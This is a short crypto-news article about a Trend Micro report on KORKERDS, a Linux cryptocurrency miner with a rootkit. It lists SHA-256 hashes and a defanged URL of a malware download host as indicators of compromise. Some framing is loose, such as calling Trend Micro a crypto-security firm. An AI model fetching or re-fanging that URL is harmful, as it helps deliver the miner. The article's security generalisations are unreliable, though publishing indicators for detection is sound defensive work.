Linux System Is Affected By A Malicious Crypto Mining Malware: How To Detect It?

Trend Micro, Japanese company specializing in crypto security, published a report on its website stating that they found a malware affecting Linux system.

The company found a cryptocurrency miner KORKERDS’s hidden activity from Linux users extremely suspicious and started investigation, where they found malware, later called as Coinminer.Linux.KORKERDS.AB, and its rootkit component Rootkit.Linux.KORKERDS.AA. The way of infection will be investigated very soon, there is already some information that the malware may get installed onto computer through a plugin or downloaded software. More technical aspects are described in the report.

The company explains:

“This makes it difficult to detect, as infected systems will only indicate performance issues. The malware is also capable of updating and upgrading itself and its configuration file.”

What is worth to mention is that such operating systems as Mac OS and Linux are considered to be immensely secured, thus, it is hard to integrate any file without users’ consent. The malicious mining software seems to be a built-in plugin, where a user gives an administrator consent to install anything.

Trend Micro provided some Indicators of Compromise (IoCs) to prevent users to be affected: (Editor’s Note: Indicator of compromise (IOC) — is an artifact observed on a network or in an operating system that with high confidence indicates a computer intrusion. Typical IOCs are virus signatures and IP addresses, MD5 hashes of malware files or URLs or domain names of botnet command and control servers. Source: https://en.wikipedia.org/ )

Related hashes (SHA-256):

  • cdd921a5de5d5fffc51f8c9140afa9d23f3736e591fce3f2a1b959d02ab4275e (Trojan.Linux.DLOADER.THAOOAAK)
  • baf93d22c9d1ae6954942704928aeeacbf55f22c800501abcdbacfbb3b2ddedf (Coinminer.Linux.KORKERDS.AB)
  • 0179fd8449095ac2968d50c23d37f11498cc7b5b66b94c03b7671109f78e5772 (Coinminer.Linux.KORKERDS.AA)
  • 023c1094fb0e46d13e4b1f81f1b80354daa0762640cb73b5fdf5d35fcc697960 (Rootkit.Linux.KORKERDS.AA)

Related malicious URL:

  • hxxps://monero[.]minerxmr[.]ru/1/1535595427x-1404817712[.]jpg

We want to remind you, no matter how secure your computer is, in your opinion, it still may be affected by professional cryptohackers. Thereby, if you find any suspicious file or plugin, please, read the following article or consult service centre.

What Is Hidden Mining, Why Is It Dangerous and How to Delete the Virus?

Subscribe to The Coin Shark news in Facebook: https://www.facebook.com/coinshark/